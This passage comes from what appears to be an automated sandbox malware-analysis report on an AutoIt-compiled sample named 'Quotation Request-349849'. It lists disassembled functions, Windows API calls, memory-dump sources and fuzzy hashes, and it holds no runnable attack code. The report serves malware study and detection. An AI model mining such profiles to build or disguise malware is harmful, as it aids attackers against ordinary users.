                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00847408
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00847444
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00847468
                                                      • SelectObject.GDI32(00000006,?), ref: 00847470
                                                      • DeleteObject.GDI32(?), ref: 00847479
                                                      • DeleteDC.GDI32(00000006), ref: 00847480
                                                      • ReleaseDC.USER32(00000000,?), ref: 0084748B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 0c2f6ca79c0037d6d336f4a8708903ca127903174da553d526f8ebd2a263bff9
                                                      • Instruction ID: c3168af3519423ef959bf75ef8ffc1b9db83e1aec2ee6dae062fd8852583fd7f
                                                      • Opcode Fuzzy Hash: 0c2f6ca79c0037d6d336f4a8708903ca127903174da553d526f8ebd2a263bff9
                                                      • Instruction Fuzzy Hash: 1F512775A04309EFCB15CFA8CC85EAEBBB9FF48310F148429FA5A97351C735A9408B50
                                                      Function 007D6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007F0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007D6B0C,?,00008000), ref: 007F0973
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007D6BAD
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007D6CFA
                                                        • Part of subcall function 007D586D: _wcscpy.LIBCMT ref: 007D58A5
                                                        • Part of subcall function 007F363D: _iswctype.LIBCMT ref: 007F3645
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-1018226102
                                                      • Opcode ID: a9635941c025ee7b56852437e2b88a81bbbdcafc34f7afdcd189e901c4fdc071
                                                      • Instruction ID: e25ab262466182f29dc6277a63199e2a3884fbbd24aa3b707104a3e7a8819888
                                                      • Opcode Fuzzy Hash: a9635941c025ee7b56852437e2b88a81bbbdcafc34f7afdcd189e901c4fdc071
                                                      • Instruction Fuzzy Hash: C2025671108340DFC724EF24C8859AFBBF5FF94314F14492EF59A972A2DA38A949CB52
                                                      Function 00832D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832D50
                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00832DDD
                                                      • GetMenuItemCount.USER32(00895890), ref: 00832E66
                                                      • DeleteMenu.USER32(00895890,00000005,00000000,000000F5,?,?), ref: 00832EF6
                                                      • DeleteMenu.USER32(00895890,00000004,00000000), ref: 00832EFE
                                                      • DeleteMenu.USER32(00895890,00000006,00000000), ref: 00832F06
                                                      • DeleteMenu.USER32(00895890,00000003,00000000), ref: 00832F0E
                                                      • GetMenuItemCount.USER32(00895890), ref: 00832F16
                                                      • SetMenuItemInfoW.USER32(00895890,00000004,00000000,00000030), ref: 00832F4C
                                                      • GetCursorPos.USER32(?), ref: 00832F56
                                                      • SetForegroundWindow.USER32(00000000), ref: 00832F5F
                                                      • TrackPopupMenuEx.USER32(00895890,00000000,?,00000000,00000000,00000000), ref: 00832F72
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00832F7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 3993528054-0
                                                      • Opcode ID: 4836b85b6e2aaa9e58564c9e2a998fd518cc1f3700463929efed10300281e5c4
                                                      • Instruction ID: d11cb88f5f6a3320de574a6db29794485b7b13a33dc5aa420f2f3b44d468890b
                                                      • Opcode Fuzzy Hash: 4836b85b6e2aaa9e58564c9e2a998fd518cc1f3700463929efed10300281e5c4
                                                      • Instruction Fuzzy Hash: A771D370600209BBEB219F58DC46FAABF64FF84364F144216F625EA1E2C7756810DBD1
                                                      Function 008277DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • _memset.LIBCMT ref: 0082786B
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008278A0
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008278BC
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008278D8
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00827902
                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0082792A
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00827935
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0082793A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1411258926-22481851
                                                      • Opcode ID: 2b13204ebfe469ab6f69b14375865b7e09611dad9a9d3c877f20d54e68ccb212
                                                      • Instruction ID: 4673edc061e75e7b4909a69ff4eef51fd826d1b06181a4bba51529b7157f90b3
                                                      • Opcode Fuzzy Hash: 2b13204ebfe469ab6f69b14375865b7e09611dad9a9d3c877f20d54e68ccb212
                                                      • Instruction Fuzzy Hash: C841F872814629EBCF15EBA4DC99DEEB778FF04310F04446AE915A32A1EB389D44CB90
                                                      Function 00850E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0084FDAD,?,?), ref: 00850E31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 61d8a5aca4b5e939451e462f454c35f474c89c49f257ec58fa009724a063cc78
                                                      • Instruction ID: c410fd91e6d2be55d88b6240222f71f20ebaa9b36c9933b16e12748a55f8c70c
                                                      • Opcode Fuzzy Hash: 61d8a5aca4b5e939451e462f454c35f474c89c49f257ec58fa009724a063cc78
                                                      • Instruction Fuzzy Hash: 4641373110024ACBCF20EE50D96AAFE3764FF11305F584455FD959B392DB38A91ECBA1
                                                      Function 0082F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0080E2A0,00000010,?,Bad directive syntax error,0085F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0082F7C2
                                                      • LoadStringW.USER32(00000000,?,0080E2A0,00000010), ref: 0082F7C9
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • _wprintf.LIBCMT ref: 0082F7FC
                                                      • __swprintf.LIBCMT ref: 0082F81E
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0082F88D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 1506413516-4153970271
                                                      • Opcode ID: 4a02f6ad105a93ecfa43936aacfa3d52319f946819d69c65acf57112aded8ce8
                                                      • Instruction ID: 2ebfbf8cc3a523632ed94703a77c9c3215d942ce199cc1df1ad850a421d63ace
                                                      • Opcode Fuzzy Hash: 4a02f6ad105a93ecfa43936aacfa3d52319f946819d69c65acf57112aded8ce8
                                                      • Instruction Fuzzy Hash: A221613194021DEFCF15EF90CC5EEEE7779FF14301F040466B615A62A2EA399658DB50
                                                      Function 008352C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                        • Part of subcall function 007D7924: _memmove.LIBCMT ref: 007D79AD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00835330
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00835346
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00835357
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00835369
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0083537A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: bbbed38a3a5ea10414bdae66b7677f60ab2344d9ac414c7322e27fd325278276
                                                      • Instruction ID: 00d072ba9c768d5a14062422143daf6e7e614b5a15bd790a36646e5a55cf30c6
                                                      • Opcode Fuzzy Hash: bbbed38a3a5ea10414bdae66b7677f60ab2344d9ac414c7322e27fd325278276
                                                      • Instruction Fuzzy Hash: 48116021A90169BAD724B665CC5EDFF6BBCFBD6B44F80042AB415E22D1EEA41904C6A0
                                                      Function 008346B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: be9b3d9a852572deae4047e7e70e710c5642f69674fdcbd91744479122601226
                                                      • Instruction ID: 9a5736be219889f842ebbc13394bf0abbd7919e4647cafd9fc23ba75545470d3
                                                      • Opcode Fuzzy Hash: be9b3d9a852572deae4047e7e70e710c5642f69674fdcbd91744479122601226
                                                      • Instruction Fuzzy Hash: 8B11E73150421CAFCB14BB349C4AEEA7BBCFF42712F0401B6F645D6292FF7999818A90
                                                      Function 00834F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00834F7A
                                                        • Part of subcall function 007F049F: timeGetTime.WINMM(?,75A4B400,007E0E7B), ref: 007F04A3
                                                      • Sleep.KERNEL32(0000000A), ref: 00834FA6
                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00834FCA
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00834FEC
                                                      • SetActiveWindow.USER32 ref: 0083500B
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00835019
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00835038
                                                      • Sleep.KERNEL32(000000FA), ref: 00835043
                                                      • IsWindow.USER32 ref: 0083504F
                                                      • EndDialog.USER32(00000000), ref: 00835060
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: 7e2c222b302bb72b54be76a164b1eb5dac83f6439916b0f9ec82df2084e3a1f8
                                                      • Instruction ID: b80e69da759c94d0f9b2aedbc0a2fad1ac366757affe60756d6874d15d5af0e7
                                                      • Opcode Fuzzy Hash: 7e2c222b302bb72b54be76a164b1eb5dac83f6439916b0f9ec82df2084e3a1f8
                                                      • Instruction Fuzzy Hash: EF219974304B05AFE7116F60EC89A263BA9FB96746F0D1025F201C21B2EB799D50D7E1
                                                      Function 0083D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • CoInitialize.OLE32(00000000), ref: 0083D5EA
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0083D67D
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0083D691
                                                      • CoCreateInstance.OLE32(00862D7C,00000000,00000001,00888C1C,?), ref: 0083D6DD
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0083D74C
                                                      • CoTaskMemFree.OLE32(?,?), ref: 0083D7A4
                                                      • _memset.LIBCMT ref: 0083D7E1
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0083D81D
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0083D840
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0083D847
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0083D87E
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0083D880
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: a91598bf124d19fde578f2dbcafadbbb9b73671f7ac9f65aaf076b2619506888
                                                      • Instruction ID: 8345422844a735ab62540d0b515a583748e0190367339bbcbf94ae73f36832c3
                                                      • Opcode Fuzzy Hash: a91598bf124d19fde578f2dbcafadbbb9b73671f7ac9f65aaf076b2619506888
                                                      • Instruction Fuzzy Hash: 2EB1EB75A00209EFDB04DFA4D889DAEBBB9FF88304F148469E919DB251DB34ED41CB90
                                                      Function 0082C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 0082C283
                                                      • GetWindowRect.USER32(00000000,?), ref: 0082C295
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0082C2F3
                                                      • GetDlgItem.USER32(?,00000002), ref: 0082C2FE
                                                      • GetWindowRect.USER32(00000000,?), ref: 0082C310
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0082C364
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0082C372
                                                      • GetWindowRect.USER32(00000000,?), ref: 0082C383
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0082C3C6
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0082C3D4
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0082C3F1
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0082C3FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: 98a4a8a1a3fec34306aa57847b99cb020c74040d6d7508603c273c54652558ea
                                                      • Instruction ID: 83fe1b88353929445f129e3ee6fc2a60b958020cf4e56d630eb7d81eaa88fcbb
                                                      • Opcode Fuzzy Hash: 98a4a8a1a3fec34306aa57847b99cb020c74040d6d7508603c273c54652558ea
                                                      • Instruction Fuzzy Hash: AB514F71B00305AFDB18CFA9DD89AAEBBBAFB98311F14852DF615D7291D7709D408B10
                                                      Function 007D201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007D2036,?,00000000,?,?,?,?,007D16CB,00000000,?), ref: 007D1B9A
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007D20D3
                                                      • KillTimer.USER32(-00000001,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 007D216E
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0080BCA6
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 0080BCD7
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 0080BCEE
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 0080BD0A
                                                      • DeleteObject.GDI32(00000000), ref: 0080BD1C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 68276ff32bbed259f20961cafc56bf9adfb4b7ea37d5cd512ced003fbdfc4d4c
                                                      • Instruction ID: e8e662f69a69dd0d4172dcc00d2e632c658b1da381689c9d474be9d4ee00d09d
                                                      • Opcode Fuzzy Hash: 68276ff32bbed259f20961cafc56bf9adfb4b7ea37d5cd512ced003fbdfc4d4c
                                                      • Instruction Fuzzy Hash: 93618F31110B00DFDB36AF14DD48B2AB7F1FF54312F54852AE54297AB2C779A892DB50
                                                      Function 007D21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC
                                                      • GetSysColor.USER32(0000000F), ref: 007D21D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 968ed529c82fb07abc814db4a33c86cb655956e09d6b04fa4f132b4a6a46da9a
                                                      • Instruction ID: 135c715bd872edfdfc5c555a82588868fe6bfab542b1d7946c584ee53f6fe53f
                                                      • Opcode Fuzzy Hash: 968ed529c82fb07abc814db4a33c86cb655956e09d6b04fa4f132b4a6a46da9a
                                                      • Instruction Fuzzy Hash: 7A417031104640DBDB265F28DC88BB93B65FB16331F194266FE658A2E7C7399C43DB21
                                                      Function 0083A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,0085F910), ref: 0083A90B
